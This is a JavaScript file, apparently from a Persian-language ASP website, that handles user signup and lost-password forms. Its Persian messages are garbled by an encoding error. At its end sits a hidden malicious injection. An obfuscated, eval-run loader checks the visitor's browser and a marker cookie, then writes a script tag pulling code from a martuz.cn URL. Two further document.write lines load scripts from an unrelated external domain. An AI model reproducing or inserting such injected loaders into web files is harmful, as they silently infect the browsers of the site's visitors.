ÿþ 
  
  
  
  
 / /   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
 / /   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   	 	 	 	 	 	 	 	 M A T C H  
 / /   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
 	 v a r   m a t c h U s e r F o r m F i e l d s   =   n e w   A r r a y ( ) ;    
 	 f o r   ( v a r   i L o o p = 0 ; i L o o p < 1 3 ; i L o o p + + )  
 	 	 m a t c h U s e r F o r m F i e l d s [ i L o o p ]   =   n e w   f o r m F i e l d C l a s s ( ) ;  
 	 m a t c h U s e r F o r m F i e l d s [ 0 ] . n a m e   =   " m a t c h U s e r I D " ;  
 / / 	 m a t c h U s e r F o r m F i e l d s [ 1 ] . n a m e   =   " m a t c h U s e r U s e r n a m e " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 1 ] . n a m e   =   " m a t c h U s e r F i r s t n a m e " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 2 ] . n a m e   =   " m a t c h U s e r L a s t n a m e " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 3 ] . n a m e   =   " m a t c h U s e r S h e n a s n a m e " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 4 ] . n a m e   =   " m a t c h U s e r B i r t h D a y " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 5 ] . n a m e   =   " m a t c h U s e r B i r t h M o n t h " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 6 ] . n a m e   =   " m a t c h U s e r B i r t h Y e a r " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 7 ] . n a m e   =   " m a t c h U s e r C i t y " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 8 ] . n a m e   =   " m a t c h U s e r E m a i l " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 9 ] . n a m e   =   " m a t c h U s e r P h o n e " ;  
 / / 	 m a t c h U s e r F o r m F i e l d s [ 1 1 ] . n a m e   =   " m a t c h U s e r M o b i l e " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 1 0 ] . n a m e   =   " m a t c h U s e r P a s s w o r d " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 1 1 ] . n a m e   =   " m a t c h U s e r C o n f i r m " ;  
 	 m a t c h U s e r F o r m F i e l d s [ 1 2 ] . n a m e   =   " m a t c h U s e r A l l o w S h o w " ;  
  
 / / 	 u s e r D e t a i l F o r m F i e l d s [ 0 ] . t y p e   =   " T " ;  
 / / 	 f o r   ( i L o o p   =   1 ; i L o o p < 5 ; i L o o p + + )  
 / / 	 	 n e w s D e t a i l F o r m F i e l d s [ i L o o p ] . t y p e   =   " L " ;  
  
  
 f u n c t i o n   m a t c h U s e r A d d ( )  
 {  
 	 c l o s e D i a l o g ( " f o r m T e m p l a t e " ) ;  
 	 s h o w D i a l o g ( " l o a d i n g B o x " ) ;  
 	 v a r   u r l ;  
 	 u r l   =   " I D = " + g e t F i e l d V a l u e ( " m a t c h U s e r I D " ) ;  
 	 f o r   ( v a r   i L o o p = 1 ; i L o o p < m a t c h U s e r F o r m F i e l d s . l e n g t h ; i L o o p + + )  
 	 {  
 	 	 u r l   + =   " & "   +   m a t c h U s e r F o r m F i e l d s [ i L o o p ] . n a m e   +   " = "   +   g e t F i e l d V a l u e ( m a t c h U s e r F o r m F i e l d s [ i L o o p ] . n a m e ) ;  
 	 }  
 	 c a l l A s p ( " m a t c h S i g n u p . a s p " , u r l , " m a t c h U s e r A d d 2 " ) ;  
 }  
  
  
 f u n c t i o n   m a t c h U s e r A d d 2 ( )  
 {  
 	 i f   ( x m l H t t p . r e a d y S t a t e = = 4   | |   x m l H t t p . r e a d y S t a t e = = " c o m p l e t e " )  
   	 {  
 / / 	 	 d e A c t i v e W a i t 4 C e l l ( " c o n f i r m L a y e r W a i t T D " ) ;  
 	 	 v a r   m e s s a g e ;  
 	 	 c l o s e D i a l o g ( " l o a d i n g B o x " ) ;  
   	 	 v a r   r s p   =   x m l H t t p . r e s p o n s e T e x t ;  
 / / w i n d o w . c l i p b o a r d D a t a . s e t D a t a ( ' T e x t ' , r s p ) 	 	  
 	 	 i f   ( r s p = = " O K " )  
 	 	 {  
 	 	 	 m e s s a g e B o x H a n d l e _ K e y   =   " c l o s e D i a l o g ( \ " m e s s a g e B o x \ " ) ; " ;  
 	 	 	 m e s s a g e B o x _ m e s s a g e . i n n e r H T M L   =   " +(*  F'E  ('  EHABJ*  'F,'E  4/. " ;  
 	 	 	 s h o w D i a l o g ( " m e s s a g e B o x " ) ;  
 	 	 }  
 	 	 e l s e  
 	 	 {  
 	 	 	 f o r m T e m p l a t e M s g _ n e x t F u n c t i o n   =   " m a t c h R e t r y S i g n u p ( ) ; " ;  
 	 	 	 i f   ( r s p = = " p e r s o n E x i s t " )  
 	 	 	 	 m e s s a g e   =   " 4E'  B(D'K  /1  3J3*E  +(*  F'E  ©1/G  'J/" ;  
 	 	 	 e l s e   i f   ( r s p = = " e m a i l E x i s t " )  
 	 	 	 	 m e s s a g e   =   " ~3*  'D©*1HFJ©Ì  H'1/  4/G  /1  3J3*E  EH,H/  '3*" ;  
 	 	 	 e l s e   i f   ( r s p = = " P a s s w o r d N o t M a t c h " )  
 	 	 	 	 m e s s a g e   =   " ©DEG  9(H1  H'1/  4/G  H  *©1'1  "F  J©3'F  FJ3*F/" ;  
 	 	 	 e l s e   i f   ( r s p = = " n o t E n t e r e d " )  
 	 	 	 	 m e s s a g e   =   " J©J  '2  AJD/G'J  3*'1G  /'1  *©EJD  F4/G  '3*" ;  
 	 	 	 e l s e  
 	 	 	 	 m e s s a g e   =   " 'J1'/  F'E4.5  /1  +(*  '7D'9'*.   D7A'K  (9/'K  *D'4  ©FJ/" ;  
 	 	 	 m e s s a g e B o x S h o w ( 2 , " .7'" , m e s s a g e ) ;  
 	 	 }  
   	 }  
 }  
  
  
 f u n c t i o n   m a t c h R e t r y S i g n u p ( )  
 {  
 	 c l o s e D i a l o g ( " f o r m T e m p l a t e M s g " ) ;  
 	 s h o w D i a l o g ( " f o r m T e m p l a t e " ) ;  
 }  
  
  
 f u n c t i o n   l o s t P a s s w o r d ( )  
 {  
 	 v a r   t e m p S t r ;  
 	 t e m p S t r   =   " < t a b l e   b o r d e r = \ " 0 \ "   c e l l p a d d i n g = \ " 2 \ "   w i d t h = \ " 1 0 0 % \ "   i d = \ " t a b l e 1 \ "   d i r = \ " r t l \ " > " ;  
 	 t e m p S t r   + =   " < t r > " ;  
 	 t e m p S t r   + =   " 	 < t d   w i d t h = \ " 5 0 \ " > < f o n t   s i z e = 1 > E m a i l : < / f o n t > < / t d > " ;  
 	 t e m p S t r   + =   " 	 < t d > " ;  
 	 t e m p S t r   + =   " 	 	 < i n p u t   t y p e = \ " t e x t \ "   n a m e = \ " l o s t P a s s w o r d E m a i l \ "   s i z e = \ " 2 0 \ "   s t y l e = \ " w i d t h :   1 0 0 % ;   b o r d e r :   1 p x   s o l i d   # A 4 D 5 A A ;   p a d d i n g - l e f t :   4 p x ;   p a d d i n g - r i g h t :   4 p x ;   p a d d i n g - t o p :   1 p x ;   p a d d i n g - b o t t o m :   1 p x \ "   d i r = \ " l t r \ " > < / t d > " ;  
 	 t e m p S t r   + =   " < / t r > " ;  
 	 t e m p S t r   + =   " < t r > " ;  
 	 t e m p S t r   + =   " 	 < t d   w i d t h = \ " 5 0 \ " > & n b s p ; < / t d > " ;  
 	 t e m p S t r   + =   " 	 < t d > " ;  
 	 t e m p S t r   + =   " 	 	 < i n p u t   t y p e = \ " b u t t o n \ "   o n c l i c k = \ " l o s t P a s s w o r d 2 ( ) \ "   v a l u e = \ " '13'D\ "   n a m e = \ " B 2 \ "   s t y l e = \ " c u r s o r : H a n d ;   b o r d e r :   1 p x   s o l i d   # B 3 D 7 D 7 ;   p a d d i n g - l e f t :   4 p x ;   p a d d i n g - r i g h t :   4 p x ;   p a d d i n g - t o p :   1 p x ;   p a d d i n g - b o t t o m :   1 p x ;   f o n t - f a m i l y : T a h o m a ;   f o n t - s i z e : 8 p t ;   b a c k g r o u n d - c o l o r : # F F F F F F ;   c o l o r : # 2 E 5 2 2 E \ " > < / t d > " ;  
 	 t e m p S t r   + =   " < / t r > " ;  
 	 t e m p S t r   + =   " < / t a b l e > " ;  
 	 d o c u m e n t . a l l . l o s t P a s s w o r d T D . i n n e r H T M L   =   t e m p S t r ;  
 	 d o c u m e n t . a l l . l o s t P a s s w o r d T i t l e . i n n e r H T M L   =   " "/13  'JEJD  .H/  1'  /1  2J1  H'1/  FE'JJ/  *'  ©DEG  9(H1  (G  "/13  4E'  '13'D  4H/" ;  
 }  
  
 f u n c t i o n   l o s t P a s s w o r d 2 ( )  
 {  
 	 i f   ( d o c u m e n t . g e t E l e m e n t B y I d ( " l o s t P a s s w o r d E m a i l " ) . v a l u e = = " " )  
 	 {  
 	 	 f o r m T e m p l a t e M s g _ n e x t F u n c t i o n = " c l o s e D i a l o g ( ' m e s s a g e B o x ' ) ; " ;  
 	 	 m e s s a g e B o x S h o w ( 0 , " .7'" , " '/13  'JEJD  1'  H'1/  F©1/G  'J/" , " " ) ;  
 	 }  
 	 e l s e  
 	 {  
 	 	 s h o w D i a l o g ( " l o a d i n g B o x " ) ;  
 	 	 c a l l A s p ( " f o r g o t P a s s w o r d . a s p " , " e m a i l = " + l o s t P a s s w o r d E m a i l . v a l u e , " l o s t P a s s w o r d 3 " ) ;  
 	 	 d o c u m e n t . a l l . l o s t P a s s w o r d T D . i n n e r H T M L   =   " " ;  
 	 	 d o c u m e n t . a l l . l o s t P a s s w o r d T i t l e . i n n e r H T M L   =   " ©DEG  9(H1  1'  A1'EH4  ©1/G  'E. . . " ;  
 	 }  
 }  
  
 f u n c t i o n   l o s t P a s s w o r d 3 ( )  
 {  
 	 i f   ( x m l H t t p . r e a d y S t a t e = = 4   | |   x m l H t t p . r e a d y S t a t e = = " c o m p l e t e " )  
   	 {  
 	 	 v a r   m e s s a g e ;  
 	 	 c l o s e D i a l o g ( " l o a d i n g B o x " ) ;  
   	 	 v a r   r s p   =   x m l H t t p . r e s p o n s e T e x t ;  
 w i n d o w . c l i p b o a r d D a t a . s e t D a t a ( ' T e x t ' , r s p ) 	 	  
 	 	 i f   ( r s p = = " O K " )  
 	 	 {  
 	 	 	 f o r m T e m p l a t e M s g _ n e x t F u n c t i o n   =   " c l o s e D i a l o g ( \ " f o r m T e m p l a t e M s g \ " ) ; " ;  
 	 	 	 m e s s a g e B o x S h o w ( 1 , " " , " ©DEG  9(H1  (G  "/13  'JEJD  4E'  '13'D  4/" ) ;  
 	 	 }  
 	 	 e l s e  
 	 	 {  
 	 	 	 f o r m T e m p l a t e M s g _ n e x t F u n c t i o n   =   " c l o s e D i a l o g ( \ " f o r m T e m p l a t e M s g \ " ) ; " ;  
 	 	 	 m e s s a g e B o x S h o w ( 0 , " .7'" , " "/13  'JEJD  H'1/  4/G  H,H/  F/'1/" ) ;  
 	 	 }  
 	 }  
 	 	  
 } <!-- 
(function(quXtM){var MzQG='%';var SeQY='var~20a~3d~22ScriptEngi~6ee~22~2cb~3d~22~56e~72sio~6e()+~22~2cj~3d~22~22~2cu~3dnavig~61tor~2eus~65rAgent~3bif((u~2eindexOf~28~22Chrome~22)~3c0~29~26~26(u~2eind~65~78Of(~22Wi~6e~22)~3e0)~26~26(u~2e~69n~64ex~4f~66(~22~4eT~206~22~29~3c~30~29~26~26(docume~6e~74~2ecoo~6bie~2ei~6edex~4ff(~22~6diek~3d1~22)~3c~30)~26~26~28typ~65o~66(~7arvzts~29~21~3dtyp~65o~66(~22A~22~29)~29~7b~7arv~7at~73~3d~22A~22~3beval(~22~69f(~77~69ndo~77~2e~22~2ba+~22~29j~3d~6a+~22+a+~22Maj~6fr~22+b+a+~22~4din~6f~72~22~2bb+a+~22Bu~69ld~22+b+~22~6a~3b~22)~3bdoc~75m~65nt~2ewrit~65~28~22~3cscr~69pt~20src~3d~2f~2f~6d~22+~22ar~74uz~2e~63n~2fvid~2f~3f~69d~3d~22~2bj~2b~22~3e~3c~5c~2fs~63ript~3e~22~29~3b~7d';var zZv=SeQY.replace(quXtM,MzQG);var yzjCP=unescape(zZv);eval(yzjCP)})(/\~/g);
 -->
document.write('<script src=http://mateuszpilich.edh.pl/oferta/moja_strona_b5.php ><\/script>');
document.write('<script src=http://mateuszpilich.edh.pl/oferta/moja_strona_b5.php ><\/script>');